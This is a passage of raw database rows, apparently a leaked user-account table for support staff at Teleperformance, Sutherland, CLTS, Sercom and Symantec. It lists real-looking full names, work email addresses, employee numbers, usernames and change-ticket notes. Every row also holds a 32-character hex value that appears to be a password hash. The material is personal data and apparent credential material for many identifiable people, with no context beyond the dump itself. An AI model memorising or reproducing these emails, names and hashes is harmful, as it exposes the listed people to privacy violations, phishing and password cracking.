Archived,57bfdc20ac6c029c0f5ead4837c101e6,Moras,<blank>,anke_moras,Anke,NULL,NU
LL,NULL
6d0-46c5-a4fa-1c1e7cf47c9f,<blank>,<blank>,rgerhardt@tparg.com,Archived Teleperf
ormance Argentina,d375456c17bce4b4c7a7184ad30756f2,Gerhardt,<blank>,Roberto_Gerh
ardt,Roberto,NULL,NULL,NULL
56f-4833-a72c-04f663766de3,<blank>,<blank>,jnavar@tparg.com,Archived Teleperform
ance Argentina,d6c3161a249acd807c646200c116b730,Perez,<blank>,Jose Navar_Perez,J
ose Navar,NULL,NULL,NULL
be6-4067-9aa6-99fe723078a9,<blank>,<blank>,wibatista@sercom.com.br,Sercom,296536
ad88be0bcd06752c848e97e192,Batista,<blank>,Willian Inacio_Batista,Willian Inacio
,NULL,NULL,NULL
841-4f1e-a80d-523e57a38f5a,<blank>,<blank>,tkphevia@sercom.com.br,Sercom,5c401c3
926af6379530294a0f6d7d785,Hevia,<blank>,Thiago_Hevia,Thiago,NULL,NULL,NULL
778-4706-bd70-ec5331eb74f1,<blank>,<blank>,dummy@dummy.com,CLTS,62da20bc81344f49
42dbc5c46e86ccf6,Zhutian,<blank>,Meiwen_Zhutian,Meiwen,NULL,NULL,NULL
779f-4a15-b448-42d08fa3e5fc,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,0ba8fb4b64f14eb8dfad9642a93cb026,Velusamy,<blank>,074652,Balasubraman
ian,NULL,NULL,NULL
db4-4f48-8142-92b8079bd3b9,<blank>,<blank>,joyce.ym-ho@clts.com,CLTS,975bda1300d
79835c85a552bdc44c4a4,Ho,<blank>,Joyce_Ho,Joyce,NULL,NULL,NULL
531-464c-9c1b-a340743d32eb,<blank>,<blank>,ricky.yw-wong@clts.com,CLTS,77c6da564
f0e3690c453d3e16594421c,Wong,<blank>,Ricky_Wong,Ricky,NULL,NULL,NULL
aff-44cf-a71c-c8aed7afa193,<blank>,<blank>,ason.chen@clts.cn,CLTS,e3442948c5272e
228603aef253b200b6,Chen,<blank>,Ason_Chen,Ason,NULL,NULL,NULL
cac-46f9-be3d-d0446bb744e1,<blank>,<blank>,RamNarayan_K@SUTH.COM,Sutherland,1dc6
61966fa003bb79bdd19062cf6d25,Narayan,<blank>,Ram_Narayan_K,Ram,NULL,NULL,NULL
5e1-4364-bba6-1c90b8eff5cc,<blank>,<blank>,RamaKrishna_T2@SUTH.COM,Sutherland,c0
b6d142732b4e44b0b5391c51e184b8,Krishna,<blank>,Rama_Krishna_T,Rama,NULL,NULL,NUL
L
b87-405d-be1d-6fce7fc8cfb3,<blank>,<blank>,jsvart@teleperformance.gr,Teleperform
ance Greek,e48bf7be15be0c50c8e9a3697e8da215,Svart,<blank>,Jaime_Svart,Jaime,NULL
,NULL,NULL
ed4-4f40-9dd6-9ca12854c4a5,<blank>,<blank>,Ramesh_KS@SUTH.COM,Sutherland,ff6a0a8
5cc199684469c2aea59846266,K,<blank>,Ramesh_K_S,Ramesh,NULL,NULL,NULL
e04-4ffe-9173-e8a9c0adba09,<blank>,<blank>,tommy.chen@clts.cn,CLTS,d748288561230
27b2f30b9dfcf1b444a,Chen,<blank>,Tommy_Chen,Tommy,NULL,NULL,NULL
592f-4715-8814-b320975da067,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,4848ed0488b549fec3d6c00b023e458f,Joseph,<blank>,075038,Jerin,NULL,NUL
L,NULL
5b5-4a7f-8eea-4ff64f0a74bb,<blank>,<blank>,lance.lan@clts.cn,CLTS,7b11ba717b1b9d
d844c742641783a232,Lan,<blank>,Lance_Lan,Lance,NULL,NULL,NULL
3f25-48f9-ab06-cd32ee2571de,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,7357cde8fac4ae6af494cfc542a297d5,P T,<blank>,075052,Roshan,NULL,NULL,
NULL
95c-4d3e-ba96-fa484f2fa5b1,<blank>,<blank>,ediamanti@teleperformance.gr,TPG Arch
ived,999815d5a8344a83be285b0d0e758401,Diamanti,<blank>,Evaggelia_Diamanti,Evagge
lia,NULL,NULL,NULL
7c7b-4b4e-8da2-9aa739f57bd5,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,864732fc667e1033968270d9745e1f10,N,<blank>,074677,Satheesh,NULL,NULL,NULL
6a6-4fc3-b55a-f6ec74628763,<blank>,<blank>,Ramesh_Krishna@SUTH.COM,Sutherland,88
1cf857661d6dee064aecd2f2c1a23d,Krishna,<blank>,Ramesh_Krishna,Ramesh,NULL,NULL,N
ULL
d76-431c-806d-df8adb3e70f8,<blank>,<blank>,dchaikalis@teleperformance.gr,TPG Arc
hived,b3203387c2bedcff3f9f310e8f7f3097,Chaikalis,<blank>,Dimitrios_Chaikalis,Dim
itrios,NULL,NULL,NULL
8e1-4aa1-8270-ea90cad3b430,<blank>,<blank>,atsitsimpakou@teleperformance.gr,TPG,
8665a8de8c9569a1045f3accb7d1315e,Tsitsimpakou,<blank>,Aspasia_Tsitsimpakou,Aspas
ia,NULL,NULL,NULL
508-4a22-aefd-61eff30cf579,<blank>,<blank>,ysylla@teleperformance.gr,TPG Archive
d,aaace567504e75e9f9ec7ef2cad6b747,Sylla,<blank>,Yalika_Sylla,Yalika,NULL,NULL,N
ULL
b40-4b66-bd77-357e4df6e13d,<blank>,<blank>,wpashalidou@teleperformance.gr,TPG Ar
chived,31225116352da9d5fb86fb43f5ebc8e1,Pashalidou,<blank>,Waltraud_Pashalidou,W
altraud,NULL,NULL,NULL
08d-48a3-ac3e-4036a1821159,<blank>,<blank>,mmpinou@teleperformance.gr,TPG Archiv
ed,64691eed38f67bf041e70e6cb11573d2,Mpinou,<blank>,Maria_Mpinou,Maria,NULL,NULL,
NULL
435-4202-b92c-40c1c246f5c8,<blank>,<blank>,accounts@symantec.teleperformance.gr,
TPG,ed8859ced2ed256029ebd6a1a7d4f596,Ntousis,<blank>,Ilias_Ntousis,Ilias,NULL,NU
LL,NULL
835-47e4-bae0-96be06a0ec03,<blank>,<blank>,mbonura@teleperformance.gr,TPG Archiv
ed,a85e9d627e0912bad5a4d1d9925fbb61,Bonura,<blank>,Maurizio_Bonura,Maurizio,NULL
,NULL,NULL
970-4cf0-813e-82d2d4527383,<blank>,<blank>,kmagiannis@teleperformance.gr,TPG Arc
hived,090c5147c19592563c0709d787e5e471,Magiannis,<blank>,Konstantinos_Magiannis,
Konstantinos,NULL,NULL,NULL
17db-4073-bd7e-e08b19b1c1b8,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,a649212f01b06131815b1762e00d1b7c,Lhouvum,<blank>,074789,Ngahnei,NULL,NULL
,NULL
35b-4d58-bb94-64a6daab77ba,<blank>,<blank>,dgotz@teleperformance.gr,TPG,d2d4282f
f907d9950f0baf0fe6cbdc03,Gotz,<blank>,Dimitrios_Gotz,Dimitrios,NULL,NULL,NULL
f1cf-43da-b7f3-903ed6dc405b,CRQ000000254780 PBP 10/05/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,a207e6811ddc6db588efe49270bd89b7,Revillas,<blank>,10182
5,Charles,NULL,NULL,NULL
103b-470f-aaaf-a4376b0b6a46,"CRQ000000256482 - RJ-May 12, 2011",000-0000,tools_i
d@symantec.suth.com,Sutherland,d5350b215058a861431be71960472ff3,Vijayan,<blank>,
116117,Vishnu,NULL,NULL,NULL
02d-4821-9742-27f8ca7c3db5,<blank>,<blank>,ling.huang@clts.cn,CLTS,591e87c7a8873
ec14f173f81dbcb34cb,Huang,<blank>,Ling_Huang,Ling,NULL,NULL,NULL
625-40a5-b6f5-2c515ccef206,<blank>,<blank>,RalphRaj_P@SUTH.COM,Sutherland,47909e
c65563c3a59b9ebbaad7730c14,Raj,<blank>,Ralph_Raj_Panneer_Selvam,Ralph,NULL,NULL,
NULL
586-4406-a1f2-07a3998b0694,<blank>,<blank>,mlevy@teleperformance.gr,TPG,262b10ef
b376591ed7d03301e49a7608,Levy-Pantazatou,<blank>,Malca_Levy_Pantazatou,Malca,NUL
L,NULL,NULL
4c9-47f3-859c-ff8e485292a0,<blank>,<blank>,dmuller@symantec.teleperformance.gr,T
PG,bfde8d9210525ce9f6ddf639aeb31a68,M\xfcller,<blank>,daniela_m\xfcller,Daniela,
NULL,NULL,NULL
65e-4542-894a-fa5bdce84f5a,<blank>,<blank>,Ramachandran_Kaimal@SUTH.COM,Sutherla
nd,3b128cf3b7da043de837bf3cc67a1c1f,Kaimal,<blank>,Ramachandran_Kaimal,Ramachand
ran,NULL,NULL,NULL
bd1-4d03-a7f0-b96b808f17cb,<blank>,<blank>,Ramasivakumar_R@SUTH.COM,Sutherland,d
b7d7720894f259ea40d53cd592088dc,R,<blank>,Ramasivakumar_R,Ramasivakumar,NULL,NUL
L,NULL
f54-47aa-84b0-3a14354b8641,<blank>,<blank>,kbialas@teleperformance.gr,TPG,da62a5
f0dddec9fceb8283e93742e1aa,Bialas,<blank>,Karin_Bialas,Karin,NULL,NULL,NULL
798-4338-bde7-003d275f4a52,<blank>,<blank>,abahn@teleperformance.gr,TPG Archived
,68d18f8838a31688a31e44399486fe3e,Bahn,<blank>,Annette_Bahn,Annette,NULL,NULL,NU
LL
349-40ae-8c1d-b7fdec979179,<blank>,<blank>,Ramesh_N5@SUTH.COM,Sutherland,e2d1878
bac616aa1e51746d7eb99f8ff,N,<blank>,Ramesh_N,Ramesh,NULL,NULL,NULL
3c9-4be8-93db-7e4e22904238,<blank>,<blank>,agazi@teleperformance.gr,TPG,573a1687
4e80454549085e67241c8617,Gazi,<blank>,Aikaterini_Gazi,Aikterini,NULL,NULL,NULL
c84-44bb-aa8b-c4000a0d1069,<blank>,060642,hans.palmberg@teleperformance.se,TPN,c
237e05738e28208700558ad7019a2d7,Palmberg,<blank>,hans_palmberg,Hans,NULL,NULL,NU
LL
6cb-4f27-8718-0684c6a7f4dd,<blank>,080122,gcoutsoumbidis@symantec.teleperformanc
e.gr,TPG,01abb815eb672c9759470d66b1fbc8f1,Coutsoumbidis,<blank>,george_coutsoumb
idis,George,NULL,NULL,NULL
294-4155-a11d-47fcf2e7a490,<blank>,071071,syolkina@symantec.teleperformance.gr,T
PG,54db96b7fe381c1bd20f3cad0c81c4fe,Yolkina,<blank>,svialtana_yolkina,Svialtana,
NULL,NULL,NULL
bc1-412e-a959-b439d561a7f4,<blank>,<blank>,RameenaS_R@SUTH.COM,Sutherland,0e7ae1
e55599293b4d9ee339af361249,S,<blank>,Rameena_S_R,Rameena,NULL,NULL,NULL
8feb-46e6-b001-f3cd8b74674f,INC000000564659--VMD--22/08/2011,000-000,Stephen_Nut
ter@symantec.com,symantec,d07ee642921abd45f423eecbcca1caf2,Nutter,<blank>,086157
,Stephen,NULL,NULL,NULL
04f-4e22-8a11-99d26caec2e2,<blank>,<blank>,tthomaidou@teleperformance.gr,TPG Arc
hived,2ea476d857baa5fb015690b138aca911,Thomaidou,<blank>,Theodora_Thomaidou,Theo
dora,NULL,NULL,NULL
19e-44e5-9b62-12339f6b92a1,<blank>,<blank>,skaraiskos@teleperformance.gr,TPG Arc
hived,d5a861e15d64f661542afdef7dd34d65,Karaiskos,<blank>,Stavros_Karaiskos,Stavr
os,NULL,NULL,NULL
09f-4557-b3c9-82be71be4c13,<blank>,<blank>,iboulamakis@teleperformance.gr,TPG Ar
chived,135ed6e31376a2430645de8de6d23112,Boulamakis,<blank>,Ioannis_Boulamakis,Io
annis,NULL,NULL,NULL
188-4a7f-8714-3a23c9bbd030,<blank>,<blank>,Ramesh_PR@SUTH.COM,Sutherland,1a1594c
c7e10b900dcf505f113125f35,Babu,<blank>,Ramesh_Babu_P_R,Ramesh,NULL,NULL,NULL
be1-4831-95a1-e3fba79bed58,<blank>,<blank>,ebalanos@teleperformance.gr,TPG Archi
ved,b4e6f40bbebc3da322b8605136545297,Balanos,<blank>,Evaggelos_Balanos,Evaggelos
,NULL,NULL,NULL
093d-4f85-889d-9df748451c5b,"CRQ000000439522-RJ-Dec6, 2011",000-0000,melrosejame
lo_alarde@SUTH.com,Sutherland,dc1ac06e017d4f2682bc1a1bb846710f,Alarde,<blank>,12
2769,Melrose Jamelo,NULL,NULL,NULL
990-43f7-8d1c-3c0933e36a05,<blank>,<blank>,vmotsiou@teleperformance.gr,TPG Archi
ved,41b5d314f6392dfe39c35d6fd2495929,Motsiou,<blank>,Vasiliki_Motsiou,Vasiliki,N
ULL,NULL,NULL
c71-494a-96d6-d554eca2d869,<blank>,<blank>,srichter@teleperformance.gr,TPG Archi
ved,c9ab19e9087e229787b544b155d60b9e,Richter,<blank>,Susann_Richter,Susann,NULL,
NULL,NULL
d96-44fb-aa05-fa3870ae8b56,<blank>,<blank>,kpolaczek@teleperformance.gr,TPG Arch
ived,2221e2b7be70b2ea034d11bcd5f348ed,Polaczek,<blank>,Katarzyna_Polaczek,Katarz
yna,NULL,NULL,NULL
937-4dce-83f6-952bb58b5e51,<blank>,080142,andreas.udden@teleperformance.se,Archi
ved Teleperformance Nordic,b39dda65d3d260471a26e18f64df3d8f,Udd\xe9n,<blank>,and
reas_udden,Andreas,NULL,NULL,NULL
78e8-4318-8e0e-dcd753771bcb,WS 27-08-2010,INC000000251655,Tools_ID@Symantec.Suth
.Com,Sutherland,0bb9f1ecd909c69d8f9cdc2491566869,Raphael,<blank>,103106,Rijo,NUL
L,NULL,NULL
4a0-4c23-8dad-82af9ee02ee7,<blank>,<blank>,rpellen@teleperformance.gr,TPG Archiv
ed,4859052025c120aa57889eed007f84a5,Pellen,<blank>,Ronan_Pellen,Ronan,NULL,NULL,
NULL
058-47d0-81fc-f49812755373,<blank>,016683,Vallie_Majors@symantec.com,Symantec,5b
dc4bee92cd0d9876aa32e43216d9d2,Slatsky,<blank>,016683,Brian,NULL,NULL,NULL
02a8-4cd6-9970-44ab3b4cf8b0,CRQ000000241079,<blank>,Subash_Prabu@symantec.com,ks
c-04/15/2011,77c9df6534e4a441bcedd20d73bf8c9e,Prabu,<blank>,114420,Subash,NULL,N
ULL,NULL
071-4136-a39b-70489c799d79,<blank>,090563/2614953,Tools_id@symantec.suth.com,Sym
antec,ca6a63b62d05094f4bec669a8d517990,Guzman,<blank>,jennifer_deguzman,Jennifer
,NULL,NULL,NULL
bb6-477f-a2a0-d03a744bf0c4,<blank>,<blank>,spapadatos@teleperformance.gr,TPG Arc
hived,93c5b85b8ca9388b18cb09c02b1f80d2,Papadatos,<blank>,Spyridon_Papadatos,Spyr
idon,NULL,NULL,NULL
e133-4f93-aadd-2004b1749b75,CRQ000000439631-CLNP Dec 06 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,e4cdb209c9a7ba66f161d3e676ac6f6b,Gernalin,<blank>,12
2809,Karen Mae Pacheco,NULL,NULL,NULL
a5ec-4efd-be47-79bc82e22a2d,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,3ef65a43e0c49b80488c3f7051276068,Armstrong,<blank>,085734,Corey,NULL,NULL,NULL
dfd2-413a-a94d-09940e89bc1f,CRQ000000598536--vmd--21/03/2012,000-000,christian_m
onsalve@Suth.com,Sutherland,279d4761c7709a3dbb614e81f4c1a610,Monsalve,<blank>,22
2537,Christian,NULL,NULL,NULL
7d6-425f-af58-187d973cd4b3,<blank>,<blank>,mjanoska@teleperformance.gr,TPG Archi
ved,7f881d19d5c8287f5eaad158c199322f,Janoska,<blank>,Monika_Janoska,Martyna,NULL
,NULL,NULL
818-4239-93c8-d007f8778dab,<blank>,<blank>,skatsogiannou@teleperformance.gr,TPG
Archived,22bb36ff07e7bf1e46ae7bd5ae8fb518,Katsogiannou,<blank>,Sofia_Katsogianno
u,Sofia,NULL,NULL,NULL
4db-44ba-ba5d-f33b8440e99c,24/03/2010 - SPJ,INC000000138500,smpotos@teleperforma
nce.gr,TPG,c91d695c4eb4de7cdf40a847b8749e24,Mpotos,<blank>,Stavros_Mpotos,Stavro
s,NULL,NULL,NULL
2ad1-4668-bd5c-103352dc1cd6,CRQ000000709695--vmd--26/06/2012,<blank>,florlyn_gon
zales@suth.com,sutherland,69828dee554e803e81a8de7bec5ece4e,Gonzales,<blank>,2264
39,Flor Lyn,NULL,NULL,NULL
267-416b-88c1-00f2cc28e5b6,<blank>,<blank>,ezarifi@teleperformance.gr,TPG Archiv
ed,15d5d4c154c18dc0d0b5512a2837059a,Zarifi,<blank>,Evgenia_Zarifi,Evgenia,NULL,N
ULL,NULL
c7ad-403b-814a-590efa08e322,CRQ000000415020--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,e1de0224192a91f1bdccd8e39f04123a,Krishnan,<blank>,122
518,Naveen,NULL,NULL,NULL
063-4c57-8c45-df5d53bd4666,<blank>,<blank>,krevithis@teleperformance.gr,Teleperf
ormance Greece,7c71027696c847fa1eb7b537b9f5f456,Revithis,<blank>,Konstantinos_Re
vithis,Konstantinos,NULL,NULL,NULL
882f-4104-b951-61c37e8abbb8,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,38de83ae1cb233160c85d5eb75e1c0b1,M A,<blank>,074389,Mohan,NULL,NULL,NULL
0ff-4ccd-a199-badce596f7d3,<blank>,<blank>,ecarrasco@teleperformance.gr,TPG Arch
ived,d7f32e2ecbf394cf6b7a22d0559751fc,Carrasco,<blank>,Ester_Carrasco,Ester,NULL
,NULL,NULL
7b5d-4c02-8a41-fc5019357ec0,"CRQ000000602133 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,455d9b0af55f0b454c322e8f60279041,DeLara,<blank>
,222561,ChavirleyMarie,NULL,NULL,NULL
3db-4520-bf1c-22c70a882e64,<blank>,<blank>,gfurhmann@teleperformance.gr,TPG Arch
ived,e934d11e18d4493e007784fe45d0e7db,Furhmann,<blank>,Georgia_Furhmann,Georgia,
NULL,NULL,NULL
f29-49d9-b5d1-486dc3a47d94,<blank>,<blank>,ebentesis@teleperformance.gr,TPG Arch
ived,28be07f1b199adf1a31fc7c1a6c7474d,Bentesis,<blank>,Evgenia_Bentesis,Evgenia,
NULL,NULL,NULL
ae7-471f-8553-3bc3d78e890e,<blank>,<blank>,kmarkogiannakis@teleperformance.gr,TP
G Archived,fc4670d0de86f772482817e4c2977fd0,Markogiannakis,<blank>,Konstantinos_
Markogiannakis,Konstantinos,NULL,NULL,NULL
637a-44f0-88ce-8de39aaf82d4,"CRQ000000602136 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,ef6ab7857511ee7251d934d82a06bf04,Esma,<blank>,2
22562,SheilaRuby,NULL,NULL,NULL
9b6-4abd-b7a6-a0d4ba3746ac,<blank>,071080,vmpoltsi@symantec.teleperformance.gr,T
PG,78e787ff5c8b44888496fd24b8496634,Boltsi,<blank>,vasiliki_boltsi,Vasiliki,NULL
,NULL,NULL
0bc-44b4-b712-cf9dfbf83eb2,<blank>,052975,abroemmel@teleperformance.gr,TPG,cb912
7a24e940d44b25b841dd2b87dd0,Broemmel,<blank>,Annette_Broemmel,Annette,NULL,NULL,
NULL
2ea-43a8-9190-e3d64dd2def9,<blank>,<blank>,mkoutsouridou@teleperformance.gr,TPG
Archived,ed148d37eb6737cff7003b38ae889307,Koutsouridou,<blank>,Maria_Koutsourido
u,Maria,NULL,NULL,NULL
d27-4470-9786-5552b89edd37,<blank>,<blank>,pkostaras@teleperformance.gr,TPG Arch
ived,382e8e37d4acdc5dd1a2cf9b338c91ca,Kostaras,<blank>,Petros_Kostaras,Petos,NUL
L,NULL,NULL
e5a-4a39-8981-e1ad528b6cb3,<blank>,<blank>,tntinos@teleperformance.gr,TPG Archiv
ed,84be0f9e846ec43379e75f4f96992947,Ntinos,<blank>,Theodoros_Ntinos,Theodoros,NU
LL,NULL,NULL
bb7-4a1e-b24d-971e4d503024,<blank>,<blank>,smohamed@teleperformance.gr,TPG Archi
ved,b958a5d046307ab8741a1ca5f78df373,mohamed,<blank>,Sayeda_mohamed,Sayeda,NULL,
NULL,NULL
27b-484c-b895-79c822b81ba7,<blank>,072410,easonitou@symantec.teleperformance.gr,
TPG Archived,e44a2e97fc6f63aec501cecabc123a6b,Asonitou,<blank>,elsa_asonitou,Els
a,NULL,NULL,NULL
e5a-426d-aa91-446ceca07f4d,<blank>,<blank>,Ramya_Nair@SUTH.COM,Sutherland,07ec4e
22eed5c4e6224eefc6c4adb4a9,Ravindran,<blank>,Ramya_Ravindran_Nair,Ramya,NULL,NUL
L,NULL
d85-4698-bd5a-7c590ebda861,<blank>,<blank>,Ranjini_Sasidharan@SUTH.COM,Sutherlan
d,fefb90b87b12b927d2d825946ff2882e,Sasidharan,<blank>,Ranjini_Sasidharan,Ranjini
,NULL,NULL,NULL
2761-4290-8fd7-48c444027688,"CRQ000000602139 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,5e3fbc06f926486ce3e231d27523326a,Jalac,<blank>,
222564,Elovel,NULL,NULL,NULL
caf3-43e7-bae4-8858f16e4098,CRQ000000603608--vmd--23/03/2012,<blank>,mariatheres
a_patrici@Suth.com,Sutherland,52599794ac9a5b81c5c7c766970598ae,Patricio,<blank>,
222674,MariaTheresa,NULL,NULL,NULL
4da6-4ce9-9f14-c2051484ac6c,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,9395b66f35a80475e23998bdb3bbed25,Tremblay,<blank>,085738,Melissa,NULL,NULL,NULL
8f1-44e0-a983-7a7a7d134cae,<blank>,<blank>,Rathna_Kalidas@suth.com,Sutherland,b7
37c658576778f71179984c99d7cfa1,Kamakshi,<blank>,Rathna_Kamakshi_Kalidas,Rathna,N
ULL,NULL,NULL
4261-4566-99f5-3fc840fb7250,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,13b90572f386f34580bb0241bd024c9d,Capricho,<blank>,085743,Lyn,NULL,NULL,NULL
982-44a3-b069-3c0a8bab7d26,<blank>,<blank>,Ravi_Peters@suth.com,Sutherland,d62ca
1c8dd9f2a8d3b6919200b4ee35f,Henry,<blank>,Ravi_Henry_Peters,Ravi,NULL,NULL,NULL
da2-441c-89a5-aacf62271fca,<blank>,<blank>,Ravi_K@suth.com,Sutherland,03ebfd7a31
13305c3dbcd814d6ab124d,Karuppuswamy,<blank>,Ravi_Karuppuswamy,Ravi,NULL,NULL,NUL
L
1b7-4a20-b970-05104183e779,<blank>,<blank>,RaviPrabhakar_Cheerath@SUTH.COM,Suthe
rland,d0c6bf52977a4ebc8982e94d8212da00,Prabhakar,<blank>,Ravi_Prabhakar_Cheerath
,Ravi,NULL,NULL,NULL
ee33-4fbb-bfce-1daa0e529286,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,cf2d7ef0049e926f401d03b471acb31a,Jamir,<blank>,085751,Napoleon,NULL,NULL,NULL
341-4fed-9747-0471c5e27fe0,<blank>,<blank>,ezervas@teleperformance.gr,TPG Archiv
ed,492156809d4ad0489acedf557e9e7014,Zervas,<blank>,Evaggelos_Zervas,Evaggelos,NU
LL,NULL,NULL
87d-4675-a37a-c841310d2f1e,<blank>,<blank>,Ranjith_Sadanandan@SUTH.COM,Sutherlan
d,f21654855624bfff34326aed062ac4d5,T,<blank>,Ranjith_T_Sadanandan,Ranjith,NULL,N
ULL,NULL
cf0e-4cd0-b37c-721184567c06,<blank>,<blank>,tools_id@symantec.suth.com,RM-10feb
2012-CRQ000000551699,cdb4cf11c28ae269f4ff3dab4e98b637,Sharma,<blank>,124792,Asho
k ,NULL,NULL,NULL
f8f-4426-a23a-d13336180ed2,<blank>,<blank>,RatheeshRavi_R@SUTH.COM,Sutherland,12
92ff29a14cd982e9dd97c7cf5037f6,Ravi,<blank>,Ratheesh_Ravi_R,Ratheesh,NULL,NULL,N
ULL
e658-4488-b2ec-350ad6bd3a8d,<blank>,<blank>,veena_jadyar@SUTH.COM,PM - 2/20/2012
- CRQ000000560479,10e4c60fb3660e7bfa48f60f75368a51,Jadyar,<blank>,125029,Veena,
NULL,NULL,NULL
c79-4985-bd85-ab3a9e0e53fc,<blank>,<blank>,Ravichandran_KC@SUTH.COM,Sutherland,f
7ec1db10ff9f2061d68f6a0ff2e46ba,K,<blank>,Ravichandran_K_C,Ravichandran,NULL,NUL
L,NULL
bd5-4d9d-b6cc-21c564de4bdb,<blank>,<blank>,Rayner_Rodricks@SUTH.COM,Sutherland,1
30a46db32bd97abaff3d71c4c4e9b66,Harold,<blank>,Rayner_Harold_Rodricks,Rayner,NUL
L,NULL,NULL
4ae5-4f3d-bb17-5a08c10101b2,CRQ000000653474 SP 8 May 2012,000-0000,hasnain_noora
ni@symantec.suth.com,Sutherland,f3026af81eaa3fd304824a7f5f132e69,Noorani,<blank>
,224432,Hasnain,NULL,NULL,NULL
a85-464e-9d7d-becd12996a9a,<blank>,<blank>,Regina_Boniface@SUTH.COM,Sutherland,9
879baead693fc1e46b5bfacbdee7235,Boniface,<blank>,Regina_Boniface,Regina,NULL,NUL
L,NULL
11f9-4495-a03c-5fd9251a837f,"CRQ000000682586 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,c4867cbe0d6b870636fc0fb409e5dac4,Siddiki,<bla
nk>,226238,Mohamed Aris,NULL,NULL,NULL
c90d-4e84-bc6a-a7df58d49c93,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606991 - PR - 27th March 2012,1356ece99ee38a8bd845f095e113435f,Upadhyay,<blank>,
223109,Dhirendra ,NULL,NULL,NULL
3d9-496e-a797-3225aa35c859,<blank>,<blank>,Renjith_C@SUTH.COM,Sutherland,5d1ba92
f4009be068328b52b8c458169,V,<blank>,Renjith_V_C,Renjith,NULL,NULL,NULL
c93b-47d7-b8ca-73340190dc4c,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,415617fb1e4e39ff72f7e0c70c9a27a2,Pallan,<blank>,088457,Zubin,NULL,NUL
L,NULL
fc93-4ccf-9dcd-3311cf3cb9d4,CRQ000000621110 Sp 9 April 2012,000-0000,Irfan_Malik
@symantec.suth.com,Sutherland,e0077f925accfa8338682f20a50dce87,Malik,<blank>,223
068,Irfan,NULL,NULL,NULL
e05-48de-920f-00d07a5314b4,<blank>,<blank>,RenoyGeorge_Titus@SUTH.COM,Sutherland
,094c1068524235afe8631fb4a75d09f5,George,<blank>,Renoy_George_Titus,Renoy,NULL,N
ULL,NULL
491-4e40-9de2-a718df8df4e1,<blank>,<blank>,Revathi_Patchaiappan@suth.com,Sutherl
and,a2b4d9f194cd1d5c97cf32430adcd083,Patchaiappan,<blank>,Revathi_Patchaiappan,R
evathi,NULL,NULL,NULL
274-40f8-8ba7-dd90f1c272c9,<blank>,<blank>,Revathy_K@SUTH.COM,Sutherland,6ce45de
6a6efab15acc5e9895ed529f2,Saiprethaa,<blank>,Revathy_Saiprethaa_K,Revathy,NULL,N
ULL,NULL
093-48ea-bcfc-fe083c942d47,<blank>,<blank>,Reynold_Rodrigues@SUTH.COM,Sutherland
,69a69ee01cc23caa09e420b38f4f4afd,Peter,<blank>,Reynold_Peter_Rodrigues,Reynold,
NULL,NULL,NULL
4b7-46e2-b480-bdff916cc948,<blank>,<blank>,RichardKishoreAntoine_M@SUTH.COM,Suth
erland,61e0efb7f55aef62f6d58ecabc7e5d27,Kishore,<blank>,Richard_Kishore_Antoine_
M,Richard,NULL,NULL,NULL
1b2-46b4-a97e-bb775ef5d50c,<blank>,<blank>,Riji_John@SUTH.COM,Sutherland,43d5c02
4313144603451111c6ee50ffd,John,<blank>,Riji_John,Riji,NULL,NULL,NULL
8f3-4d33-87fb-1218b6324e05,<blank>,<blank>,Rini_KR@SUTH.COM,Sutherland,90a0ed147
8a186fe3d0700154478737c,K,<blank>,Rini_K_R,Rini,NULL,NULL,NULL
449-4e16-8f51-d5ab0cc9d5d0,<blank>,<blank>,Rinkesh_Kothari@SUTH.COM,Sutherland,e
3eb578e9839c9459da765296f132eec,Ajaykumar,<blank>,Rinkesh_Ajaykumar_Kothari,Rink
esh,NULL,NULL,NULL
b25-4fb6-86d5-9255db6d9849,<blank>,<blank>,Rishdi_KH@SUTH.COM,Sutherland,3e80a8a
6e975fe6cff1d53c3d82b8eaa,K,<blank>,Rishdi_K_H,Rishdi,NULL,NULL,NULL
1cd-472e-a5c9-a1b753d7d115,<blank>,<blank>,Rishi_Singh@suth.com,Sutherland,006e8
d01ade10af0e6490e23fb9d0818,Raj,<blank>,Rishi_Raj_Singh,Rishi,NULL,NULL,NULL
9f9-4e01-ad7a-65d46de7cbb4,<blank>,<blank>,Riyaz_Mirkar@suth.com,Sutherland,2c9a
fd7eaddcbe952ac9efa1a4aca35b,Mohamed,<blank>,Riyaz_Mohamed_Mirkar,Riyaz,NULL,NUL
L,NULL
867-413f-8b20-2565b0fda2c5,<blank>,<blank>,Riyaz_Motani@SUTH.COM,Sutherland,6b44
a3ab95a86abb64a0eaa1e77ef11f,Ramzanali,<blank>,Riyaz_Ramzanali_Motani,Riyaz,NULL
,NULL,NULL
fcd-44b7-a247-94393af87bbe,<blank>,<blank>,RiyazaHameeda_P@SUTH.COM,Sutherland,f
ad631696be25362f69aa35e30e3a0ca,Hameeda,<blank>,Riyaza_Hameeda_P,Riyaza,NULL,NUL
L,NULL
00c-46b0-ba46-cf3819b4cb3e,<blank>,<blank>,RizwanAhmed_J@SUTH.COM,Sutherland,398
3c613064ef8757c44edad610000a5,Ahmed,<blank>,Rizwan_Ahmed_J,Rizwan,NULL,NULL,NULL
a81-4d29-b834-6d7eb1dcd3d8,<blank>,<blank>,Rizwan_Khan2@SUTH.COM,Sutherland,d21b
72d75a1b31592d36120b01387437,Mohammed,<blank>,Rizwan_Mohammed_Khan,Rizwan,NULL,N
ULL,NULL
1a9-4179-b218-b205acf0b3a9,<blank>,2635106,tools_id@symantec.suth.com,Sutherland
